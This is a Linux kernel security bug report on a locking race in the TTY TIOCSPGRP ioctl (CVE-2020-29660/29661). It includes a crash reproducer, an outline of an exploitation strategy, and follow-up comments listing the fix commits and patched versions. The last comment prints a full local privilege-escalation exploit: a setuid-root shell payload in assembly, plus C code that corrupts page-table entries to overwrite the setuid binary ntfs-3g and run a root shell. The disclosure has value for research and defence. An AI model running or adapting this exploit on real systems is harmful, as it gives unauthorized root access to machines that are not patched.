tiocspgrp(), the handler for the TIOCSPGRP ioctl, has the following signature:

static int tiocspgrp(struct tty_struct \*tty, struct tty_struct \*real_tty, pid_t __user \*p)  

It receives two tty_struct pointers because, for PTY pairs, userspace can use
the same ioctl() on both sides of the pair, with slightly different semantics.
tty points to the side that userspace passed to ioctl() as file descriptor
(either the TTY or the master), while real_tty always points to the TTY.

tiocspgrp() contains the following code:

static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
[...]
spin_lock_irq(&tty->ctrl_lock);
put_pid(real_tty->pgrp);
real_tty->pgrp = get_pid(pgrp);
spin_unlock_irq(&tty->ctrl_lock);
[...]
}

It always modifies the ->pgrp of the TTY but, depending on the file descriptor
passed in by the caller, sometimes takes the ->ctrl_lock of the master instead.

This means that it is possible to race TIOCSPGRP on the master with TIOCSPGRP on
the TTY.

The following reproducer quickly causes errors (e.g. starting with a
"refcount_t: addition on 0; use-after-free." message):

======================================================================
#define _GNU_SOURCE
#include <err.h>
#include <unistd.h>
#include <fcntl.h>
#include <termios.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>

int main(void) {
sync(); /* we're probably gonna crash... */

/*
* We may already be process group leader but want to be session leader;
* therefore, do everything in a child process.
*/
pid_t main_task = fork();
if (main_task == -1) err(1, "initial fork");
if (main_task != 0) {
int status;
if (waitpid(main_task, &status, 0) != main_task)
err(1, "waitpid main_task");
return 0;
}
if (prctl(PR_SET_PDEATHSIG, SIGKILL))
err(1, "PR_SET_PDEATHSIG");
if (getppid() == 1) exit(0);

/* basic preparation */
if (signal(SIGTTOU, SIG_IGN))
err(1, "signal");
if (setsid() == -1)
err(1, "start new session");

/* set up a new pty pair */
int ptmx = open("/dev/ptmx", O_RDWR);
if (ptmx == -1)
err(1, "open ptmx");
unlockpt(ptmx);
int tty = open(ptsname(ptmx), O_RDWR);
if (tty == -1)
err(1, "open tty");

/*
* Let a series of children change the ->pgrp pointer
* protected by the tty's ctrl_lock...
*/
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
if (prctl(PR_SET_PDEATHSIG, SIGKILL))
err(1, "PR_SET_PDEATHSIG");
if (getppid() == 1) exit(0);

while (1) {  
  pid_t grandchild = fork();  
  if (grandchild == -1)  
    err(1, "fork grandchild");  
  if (grandchild == 0) {  
    if (setpgid(0, 0))  
      err(1, "setpgid");  
    int pgrp = getpid();  
    if (ioctl(tty, TIOCSPGRP, &pgrp))  
      err(1, "TIOCSPGRP (tty)");  
    exit(0);  
  }  
  int status;  
  if (waitpid(grandchild, &status, 0) != grandchild)  
    err(1, "waitpid for grandchild");  
}  

}
/*
* ... while the parent changes the same ->pgrp pointer under the
* ctrl_lock of the other side of the pty pair.
*/
while (1) {
int pgrp = getpid();
if (ioctl(ptmx, TIOCSPGRP, &pgrp))
err(1, "TIOCSPGRP (ptmx)");
}
}

This seems to me like it would be fairly promising as a target for exploitation;
for example, a strategy along the following lines might work:

    enter a deeply nested PID namespace, such that you have a SLUB cache like
    pid_10 to yourself
    take a bunch of references to two struct pid instances (e.g. through pidfds
    or procfs?)
    try to hit the bug in a loop such that the refcounts are hopefully off by a
    bit, but both struct pid instances still exist
    on both struct pid, drop references one by one until one is freed
    to detect reallocation, try to get SLUB to reuse the object for another PID,
    then check something like pidfd_show_fdinfo() or tiocgsid() on the old pid
    (which mostly dump plain data from a struct pid without touching other
    stuff in there)
    get the entire SLUB high-order page freed, and try to reallocate it into
    another slab
    exploit the resulting type confusion, e.g. by changing the refcount of the
    freed struct pid

I haven't tried that yet though.

I'm going to send suggested patches for this issue and for less severe TTY
locking problems around the ->session pointer in a minute.
(The ->session stuff is sufficiently theoretical that it probably doesn't really
need the full security treatment, but I figured it'd be less messy if I include
both here...)
I have done some basic testing of these changes; the only thing that shows up as
a problem is a lockdep warning about a possible deadlock when triggering the SAK
logic via sysrq (involving console_lock, termios_rwsem and tty_bufhead::lock),
but that also happens on master and doesn't seem related to my changes.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is 2021-03-03. Disclosure at an earlier date is possible if
the bug has been fixed in Linux stable releases (per agreement with
security@kernel.org folks).


Comments

ja...@google.com <ja...@google.com> #2Dec 4, 2020 08:41AM

My suggested patches just landed in the subsystem tree:

main fix:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=54ffccbf053b5b6ca4f6e45094b942fab92a25fc

other locking fix:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=c8bcd9c5be24fb9e6132e97da5a35e55a83e36b9

ja...@google.com <ja...@google.com> #3Dec 7, 2020 01:15AM

fixes are merged into Linus' tree:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d49248eb25a223b238cd7687ea92b080f595a323

ja...@google.com <ja...@google.com> #4Dec 12, 2020 01:33PM

Marked as fixed.
Fixed in stable releases from 2020-12-11:
4.4.248
4.9.248
4.14.212
4.19.163
5.4.83
5.9.14

and in mainline in 5.11

ja...@google.com <ja...@google.com> #6Oct 19, 2021 05:02PM

```
user@deb10:~/tiocspgrp$ cat Makefile
poc: poc.c rootshell
        gcc -Wall -o poc poc.c

rootshell: rootshell.o
        ld -o rootshell rootshell.o --nmagic

rootshell.o: rootshell.S
        as -o rootshell.o rootshell.S

user@deb10:~/tiocspgrp$ cat rootshell.S
.code64
.section .text, "ax"

.globl _start
_start:

/* setuid */
mov $105, %eax
mov $0, %edi
syscall

/* execve */
mov $59, %eax
lea shell_str(%rip), %rdi
lea argv(%rip), %rsi
lea envv(%rip), %rdx
syscall

int $3

shell_str:
.asciz "/bin/bash"
argv:
.quad shell_str
.quad 0
envv:
.quad 0
user@deb10:~/tiocspgrp$ cat poc.c
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <termios.h>
#include <signal.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/mman.h>
#include <sys/epoll.h>
#include <sys/syscall.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <linux/bpf.h>

/*
 * How far the refcount of struct pid should be elevated before trying
 * to skew it down; determined by the multiplication of the two parameters.
 */
#define SOCKS_FOR_CREDS 100
#define CREDS_PER_SOCKET 100

/*
 * How often to attempt the race.
 * If this program crashes in the initial stage, lower this number.
 * A decent exploit might ramp up this number exponentially,
 * or something like that.
 */
#define SKEW_ATTEMPTS 50000

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

void pin_cpu(int cpu) {
  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(cpu, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));
}

/*
 * We want the child to be able to close its parent's file descriptors.
 */
#define fork() syscall(__NR_clone, CLONE_FILES|SIGCHLD, NULL, NULL, NULL, 0)

static int epfd = -1;

/*
 * Fill one SLUB page (32 objects).
 * One of the objects is a seq_file (so that we can free it synchronously to
 * shove the page onto the pcpu partial list), the rest are epoll items because
 * those aren't as messy in terms of fd usage and such.
 * Note that we run this without knowing the state of the current SLUB page, so
 * usually the allocated objects actually span two SLUB pages.
 * But if you run this repeatedly, each returned seq_file should be on its own
 * SLUB page, more or less.
 */
static int fill_one_page(void) {
  const int DUPFD_COUNT = 31;
  int fd = SYSCHK(eventfd(0, 0));
  int dupfds[DUPFD_COUNT];
  for (int i=0; i<DUPFD_COUNT; i++) {
    dupfds[i] = SYSCHK(dup(fd));
    struct epoll_event epev = {
      .events = EPOLLERR,
      .data = { .u64 = 0x0123456701234567 }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, dupfds[i], &epev));
  }
  for (int i=0; i<DUPFD_COUNT; i++)
    close(dupfds[i]);
  /* leave original fd open to avoid removal of epis */

  int seqfd = SYSCHK(open("/proc/meminfo", O_RDONLY));
  return seqfd;
}

/* load a 4KB BPF program. for await_rcu_call(). */
int load_dummy_bpf_prog(void) {
  struct bpf_insn insns[] = {
    {
      .code = BPF_ALU64 | BPF_MOV | BPF_K,
      .dst_reg = BPF_REG_0,
      .imm = 0
    }, {
      .code = BPF_JMP | BPF_EXIT
    }
  };
  union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = 2,
    .insns = (unsigned long)insns,
    .license = (unsigned long)""
  };
  errno = 0;
  return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/*
 * Wait for queued RCU callbacks from this CPU to execute.
 * On newer kernels we could use MEMBARRIER_CMD_GLOBAL, which is easier,
 * but on 4.19 the RCU flavors haven't been merged yet and membarrier only
 * waits for an rcu-sched grace period.
 * So instead we abuse that BPF only decrements the memory accounting of
 * BPF programs after an RCU grace period.
 */
void await_rcu_call(void) {
  printf("waiting for RCU call...\n");

  struct rlimit rlim, rlim_orig;
  SYSCHK(getrlimit(RLIMIT_MEMLOCK, &rlim_orig));
  rlim.rlim_cur = 0;
  rlim.rlim_max = rlim_orig.rlim_max;

  int bpf_res;
  while (1) {
    SYSCHK(setrlimit(RLIMIT_MEMLOCK, &rlim));

    bpf_res = load_dummy_bpf_prog();
    printf("bpf load with rlim 0x%lx: %d (%m)\n", (unsigned long)rlim.rlim_cur, bpf_res);
    if (bpf_res == -1 && errno == EPERM) {
      rlim.rlim_cur += 0x1000;
      continue;
    }
    if (bpf_res == -1)
      err(1, "unable to load bpf program");
    printf("bpf load success with rlim 0x%lx: got fd %d\n", (unsigned long)rlim.rlim_cur, bpf_res);
    break;
  }
  /* We have exhausted our deliberately lowered RLIMIT_MEMLOCK here. */

  /*
   * Close the BPF program to schedule freeing up its memory
   * after an RCU grace period.
   */
  close(bpf_res);
  while (1) {
    bpf_res = load_dummy_bpf_prog();
    if (bpf_res != -1)
      break;
    printf(".");
  }
  printf("\n");
  printf("RCU callbacks executed\n");
}

struct sockaddr_un unix_addr = {
  .sun_family = AF_UNIX,
  .sun_path = "/tmp/exploitsocket"
};

/*
 * Add @count to a struct pid by connecting @count times
 * to a socket on which the owner of that pid called listen().
 * This lets us increment the refcount of a pid even after the
 * task is already gone.
 */
void add_to_refcount(int count, int listensock) {
  for (int i=0; i<count; i++) {
    int refsock = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
    SYSCHK(connect(refsock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)));
    SYSCHK(accept(listensock, NULL, NULL) == -1);
  }
}

int main(void) {
  setbuf(stdout, NULL);
  sync(); /* we're probably gonna crash... */

  printf("starting up...\n");

  epfd = SYSCHK(epoll_create1(0));

  /*
   * We'll be relying on percpu freelist behavior.
   * If the kernel migrated us to another CPU in the middle of that,
   * that would be bad for us.
   * So tell the kernel not to do that.
   */
  pin_cpu(0);

  uid_t myuid = getuid();
  gid_t mygid = getgid();

  /*
   * We may already be process group leader but want to be session leader;
   * therefore, do everything in a child process.
   */
  pid_t main_task = SYSCHK(fork());
  if (main_task != 0) {
    int status;
    if (waitpid(main_task, &status, 0) != main_task)
      err(1, "waitpid main_task");
    return 0;
  }
  SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
  if (getppid() == 1) exit(0);

  printf("executing in first level child process, setting up session and PTY pair...\n");

  /* basic preparation */
  SYSCHK(signal(SIGTTOU, SIG_IGN));
  SYSCHK(setsid());

  /* set up a new pty pair */
  int ptmx = SYSCHK(open("/dev/ptmx", O_RDWR));
  unlockpt(ptmx);
  int tty = SYSCHK(open(ptsname(ptmx), O_RDWR));

  /* shared memory for cross-process synchronization */
  volatile int *syncptr = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
  if ((void*)syncptr == MAP_FAILED)
    err(1, "mmap shared");

  /* for references to the child pid */
  printf("setting up unix sockets for ucreds spam...\n");
  int sockpair_refhold[SOCKS_FOR_CREDS][2];
  for (int i=0; i<SOCKS_FOR_CREDS; i++)
    SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockpair_refhold[i]));

  /*
   * This socket will later be given a reference to the child's pid on listen().
   * Connecting to it will give the client an extra reference to the child's pid,
   * lifting the pid's refcount.
   * Unlike most other places that non-ephemerally increment pid refcounts, this
   * allows us to easily lift the refcount of a pid that is no longer associated
   * with any task.
   */
  int listensock = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
  unlink(unix_addr.sun_path);
  SYSCHK(bind(listensock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)));

  /*
   * Drain the percpu and node partial pages of the slab
   * to get into a pristine state.
   */
  printf("draining pcpu and node partial pages\n");
  for (int i=0; i<50; i++)
    fill_one_page();

  /*
   * Prepare the necessary VMAs for spraying page tables later.
   * We will later want to spray 30 L1 page tables, each of which will contain
   * one PTE every 128 bytes (since that is our SLUB object size).
   * Also ensure that the allocation of those L1 page tables won't cause
   * allocation of higher-level page tables.
   */
  char *suid_path = "/usr/bin/ntfs-3g";
  int suid_fd = SYSCHK(open(suid_path, O_RDONLY));
  if (mmap((void*)0x10003ffff000, 0x1000, PROT_READ, MAP_SHARED|MAP_FIXED_NOREPLACE, suid_fd, 0) == MAP_FAILED)
    err(1, "mmap to materialize L2 table and above");
  *(volatile char *)0x10003ffff000;
  for (int i=0; i<32 * 30; i++) {
    if (mmap((void*)(0x100000000000 + i * 16 * 0x1000), 0x1000, PROT_READ, MAP_SHARED|MAP_FIXED_NOREPLACE, suid_fd, 0) == MAP_FAILED)
      err(1, "mmap suid binary");
  }

  /*
   * Prepare ~40 pages filled with objects; we'll later have to shove a
   * bunch of pages into the percpu partial list to flush its contents.
   */
  printf("preparing for flushing pcpu partial pages\n");
#define NUM_DRAIN_FDS 40
  int drain_fds[NUM_DRAIN_FDS];
  for (int i=0; i<NUM_DRAIN_FDS; i++)
    drain_fds[i] = fill_one_page();

  /*
   * The child pid should be in a page together with a bunch of seqfiles
   * allocations and nothing else.
   */
  int seqfiles[32*2];
  for (int i=0; i<32; i++)
    seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));

  printf("launching child process\n");
  int parent = getpid();
  pid_t child = SYSCHK(fork());
  if (child == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));

    /* we should be on another CPU to race with our parent */
    pin_cpu(1);

    /* create post-death-incrementable pid reference */
    SYSCHK(listen(listensock, 128/*SOMAXCONN*/));

    SYSCHK(setpgid(0, 0));
    child = getpid();

    /*
     * Creates SOCKS_FOR_CREDS*CREDS_PER_SOCKET pending unix domain socket
     * messages, each one with SCM_CREDENTIALS that lift the refcount of
     * the child's `struct pid` by 1 each.
     */
    for (int sockidx = 0; sockidx < SOCKS_FOR_CREDS; sockidx++) {
      for (int refs_held = 0; refs_held < CREDS_PER_SOCKET; refs_held++) {
        struct iovec iov = { .iov_base = "a", .iov_len = 1 };
        struct __attribute__((aligned(8))) {
          struct cmsghdr hdr;
          struct ucred ucred;
        } controldata = {
          .hdr = {
            .cmsg_len = sizeof(struct cmsghdr)+sizeof(struct ucred),
            .cmsg_level = SOL_SOCKET,
            .cmsg_type = SCM_CREDENTIALS
          },
          .ucred = { .pid = child, .uid = myuid, .gid = mygid }
        };
        struct msghdr hdr = {
          .msg_iov = &iov,
          .msg_iovlen = 1,
          .msg_control = &controldata,
          .msg_controllen = sizeof(controldata)
        };
        int ret = sendmsg(sockpair_refhold[sockidx][0], &hdr, MSG_DONTWAIT);
        if (ret <= 0) {
          err(1, "sendmsg failed, CREDS_PER_SOCKET is probably too high");
          break;
        }
      }
    }
    printf("ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...\n");

    for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++) {
      while (1) {
        char syncval = *syncptr;
        if ((syncval&1) == 0) {
          if (syncval == 10)
            break;
          *syncptr = syncval + 1;
        }
      }
      /* update child -> parent (races, may leave child refcount too low and parent refcount too high) */
      SYSCHK(ioctl(tty, TIOCSPGRP, &parent));
      *syncptr = 11;
    }
    printf("refcount should now be skewed, child exiting\n");
    exit(0);
  }
  printf("child is %d\n", child);

  for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++) {
    /* update parent -> child (does not race) */
    SYSCHK(ioctl(ptmx, TIOCSPGRP, &child));

    *syncptr = 0;
    while (1) {
      char syncval = *syncptr;
      if ((syncval&1) == 1) {
        *syncptr = syncval + 1;
        /* at 9, we first bump to 10 so that the child can go ahead, then also go ahead ourselves */
        if (syncval == 9)
          break;
      }
    }

    /* update child -> parent (races, may leave child refcount too low and parent refcount too high) */
    SYSCHK(ioctl(ptmx, TIOCSPGRP, &parent));

    while (*syncptr != 11) /*wait*/;
  }
  int status;
  pid_t wait_res = waitpid(child, &status, 0);
  if (wait_res != child)
    err(1, "wait for child");
  if (WIFEXITED(status)) {
    printf("child exited cleanly\n");
  } else {
    errx(1, "child died weirdly");
  }

  /* drain the CPU slab */
  for (int i=32; i<64; i++)
    seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));

  /* let's make sure that the child drops its RCU reference on the pid before we do anything else */
  await_rcu_call();

  printf("gonna try to free the pid...\n");
  /*
   * free the pid and intentionally crash with a sort of double-free (actually
   * usually because the SLUB freelist pointer clobbers pid->level with garbage)
   */
  *syncptr = 0;
  pid_t df_child = fork();
  if (df_child == -1) err(1, "fork");
  if (df_child == 0) {
    for (int sockidx = 0; sockidx < SOCKS_FOR_CREDS; sockidx++) {
      for (int refs = 0; refs < CREDS_PER_SOCKET; refs++) {
        char dummy;
        if (read(sockpair_refhold[sockidx][1], &dummy, 1) != 1)
          err(1, "read from sockpair_refhold failed with syscall return???");
        (*syncptr)++;
      }
    }
    errx(1, "unexpectedly all socket data was flushed out successfully?");
  }
  int df_status;
  if (waitpid(df_child, &df_status, 0) != df_child)
    err(1, "waitpid");
  if (!WIFSIGNALED(df_status))
    errx(1, "double-free child did not die due to signal?");
  printf("double-free child died with signal %d after dropping %d references (%d%%)\n",
      WTERMSIG(df_status), *syncptr,
      100 * (*syncptr) / (SOCKS_FOR_CREDS * CREDS_PER_SOCKET));

  /* free all allocations in the slab page, putting it on the pcpu partial list */
  for (int i=0; i<64; i++)
    SYSCHK(close(seqfiles[i]));

  /*
   * Flush the pcpu partial list.
   * Our slab page should get freed onto the percpu order-0 page freelist
   * for nonmovable zone-normal pages; the others stay because they still have
   * active allocations.
   */
  for (int i=0; i<NUM_DRAIN_FDS; i++)
    close(drain_fds[i]);

  /* try to reallocate as page tables, with RO PTEs in every possible refcount position */
  for (int i=0; i<32 * 30; i++)
    *(volatile char*)(0x100000000000 + i * 16 * 0x1000);
  printf("hopefully reallocated as an L1 pagetable now\n");

  /* try to make the PTE writable (0x2) and dirty (0x40) */
  add_to_refcount(0x42, listensock);
  printf("PTE forcibly marked WRITE | DIRTY (hopefully)\n");

  /*
   * Try to copy the contents of our "rootshell" file into the setuid
   * executable through the corrupted PTE.
   * Since we don't know which address is the right one, and we don't
   * want to deal with catching SIGSEGV in userspace, just let the kernel
   * do the write for us via copy_to_user().
   * Note that we may still have stale RO TLB entries, which may cause
   * "spurious faults", which the kernel won't fix up when they happen
   * from userspace; but taking a spurious fault removes the stale TLB
   * entry, and it should then work on the second try. So try each
   * address twice.
   */
  int rootshell_fd = open("rootshell", O_RDONLY);
  struct stat rootshell_st;
  SYSCHK(fstat(rootshell_fd, &rootshell_st));
  bool suid_corrupted = false;
  for (int i=0; i<32 * 30; i++) {
    char *addr = (char*)(0x100000000000 + i * 16 * 0x1000);
    for (int j=0; j<2; j++) {
      int res = pread(rootshell_fd, addr, rootshell_st.st_size, 0);
      if (res == -1) {
        if (errno != EFAULT)
          perror("read into possibly-corrupted PTE failed");
        continue;
      }
      printf("clobber via corrupted PTE succeeded in page %d, 128-byte-allocation index %d, returned %d\n", i/32, i%32, res);
      suid_corrupted = true;
    }
  }

  /*
   * Flip back the writable and dirty bits, so that the kernel doesn't get
   * confused when it stumbles over dirty PTEs for a file that isn't supposed
   * to be writable. Don't worry, kernel, these are just normal read-only PTEs,
   * nothing to see here.
   * Annoyingly, we can't just decrement the references we took back down
   * because put_pid() loads an index from the UAF'ed allocation and tries to
   * use it to index into an array, which would blow up. The only way we can go
   * is up!
   * Therefore, we add more references such that the writable and dirty bits
   * disappear through the carry and some higher bit is set. That higher bit
   * being the PAT bit.
   */
  add_to_refcount(0x80-0x42, listensock);

  if (!suid_corrupted) {
    printf("the end\n");
    while (1)
      pause();
  }

  /*
   * Launch the setuid executable; the copy of it in the page cache will
   * have been overwritten with our <4KiB root shell helper.
   */
  pid_t exec_child = SYSCHK(fork());
  if (exec_child == 0) {
    execl(suid_path, suid_path, NULL);
    err(1, "execl failed");
  }

  int exec_status;
  if (waitpid(exec_child, &exec_status, 0) != exec_child)
    perror("waitpid");

  printf("parent is staying alive to prevent unwanted heap damage, don't kill this process!\n");
  while (1)
    pause();
}
user@deb10:~/tiocspgrp$
```

Related CVE Number: CVE-2020-29660,CVE-2020-29661.

Credit: Jann Horn